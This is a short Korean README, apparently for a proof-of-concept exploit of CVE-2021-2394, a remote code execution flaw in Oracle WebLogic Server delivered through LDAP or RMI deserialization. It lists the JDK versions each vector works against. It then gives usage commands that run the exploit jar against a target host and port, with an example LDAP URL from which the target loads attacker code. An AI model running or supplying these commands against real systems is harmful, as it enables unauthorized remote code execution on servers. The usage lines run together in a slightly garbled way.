
CVE-2021-2394에 대한 개념 증명 익스플로잇으로, Oracle WebLogic Server의 원격 코드 실행 취약점입니다. LDAP 또는 RMI 역직렬화를 사용하여 페이로드를 전달합니다.
CVE-2021-2394의 POC
주의 사항
RMI 기반 공격 방식은 JDK 버전이 6u132, 7u131, 8u121 이전으로 제한됩니다. 8u122 이상 버전에서는 역직렬화 화이트리스트 메커니즘이 추가되어 RMI 원격 코드 로딩이 차단되었습니다. LDAP 기반 공격 방식은 JDK 버전이 6u211, 7u201, 8u191, 11.0.1 이전으로 제한됩니다. 8u191 버전에서 Oracle은 LDAP 벡터에 제한을 설정하여 CVE-2018-3149를 발표하고 JNDI 원격 클래스 로딩을 차단했습니다. 출처: https://www.freebuf.com/vuls/279465.html
사용 방법:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit참고 링크:
업데이트
분석 글